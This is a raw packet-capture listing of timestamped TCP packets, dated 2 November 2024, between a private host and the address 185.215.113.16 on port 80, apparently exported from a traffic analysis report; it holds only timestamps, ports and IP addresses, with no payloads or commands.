                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773034096 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773071051 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773127079 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773138046 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773149014 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773159981 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773174047 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773178101 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773196936 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773216009 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773219109 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773226023 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773236990 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773250103 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773258924 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773267031 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773269892 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773277998 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773293972 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773300886 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773324966 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773329020 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773339033 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773348093 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773350954 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773361921 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773363113 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773380041 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773390055 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773391008 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773413897 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773437023 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773574114 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773585081 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773595095 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773624897 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773648977 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773652077 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773688078 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773699045 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773732901 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773766994 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773777962 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773787975 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773798943 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773816109 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773828030 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773852110 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773864985 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773885012 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773910046 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773940086 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773951054 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773967981 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773978949 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773983002 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.773989916 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.774000883 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.774003983 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.774034023 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.774036884 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.774048090 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.774059057 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.774070024 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.774074078 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.774101019 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815025091 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815042019 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815052032 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815063953 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815074921 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815114021 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815139055 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815200090 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815211058 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815226078 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815237999 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815247059 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815259933 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815272093 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815284967 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815295935 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815347910 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815359116 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815376043 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815387964 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815397024 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815408945 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815431118 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815443993 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815454960 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815466881 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815478086 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815504074 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815515995 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815526009 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815541029 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815565109 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815627098 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815639019 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815649033 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815671921 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815680027 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815690994 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815697908 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815711021 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815721035 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815722942 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815741062 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815748930 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815754890 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815766096 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815783024 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815800905 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815807104 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815814018 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815823078 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815829039 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815838099 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815846920 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815848112 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815875053 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.815888882 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816020012 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816031933 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816041946 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816051960 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816067934 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816071033 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816081047 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816092968 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816096067 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816104889 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816106081 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816116095 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816128016 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816137075 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816142082 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816169024 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816171885 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816180944 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816189051 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816203117 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816212893 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816215038 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816227913 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816240072 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816240072 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816245079 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816257000 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816257000 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816268921 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816284895 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816288948 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816294909 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816306114 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816314936 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816318035 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816329956 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816342115 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816349030 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816353083 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816358089 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816371918 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816394091 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816400051 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816412926 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816416979 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816426039 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816436052 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816446066 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816456079 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816457987 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816469908 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816477060 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816504955 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816524029 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816560984 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816586971 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816597939 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816633940 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816667080 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816683054 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816694975 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816705942 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816719055 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816720963 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816730022 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816739082 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816741943 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816761017 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816775084 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816792965 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816803932 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816812992 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816832066 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816837072 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816843033 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816854954 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816860914 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816867113 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816878080 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816888094 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816907883 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816919088 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816925049 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816936970 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816945076 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816948891 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816970110 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.816998959 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817034960 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817053080 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817064047 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817075968 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817080021 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817094088 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817095995 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817106009 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817114115 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817117929 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817128897 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817141056 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817147970 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817153931 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817158937 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817172050 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817182064 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817186117 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817193985 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817214012 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817233086 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817404032 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817420959 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817433119 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817444086 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817450047 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817456007 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817481041 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817485094 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817493916 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817502022 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817504883 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817518950 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817528963 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817532063 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817543030 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817549944 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817553997 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817569017 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817596912 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817625999 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817637920 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817647934 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817660093 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817672968 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817675114 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817688942 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817691088 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817702055 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817713976 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817749977 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817783117 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817795038 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817806005 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817828894 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.817842007 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.859512091 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.859523058 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.859534025 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.859544992 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.859600067 CET6386280192.168.2.4185.215.113.16
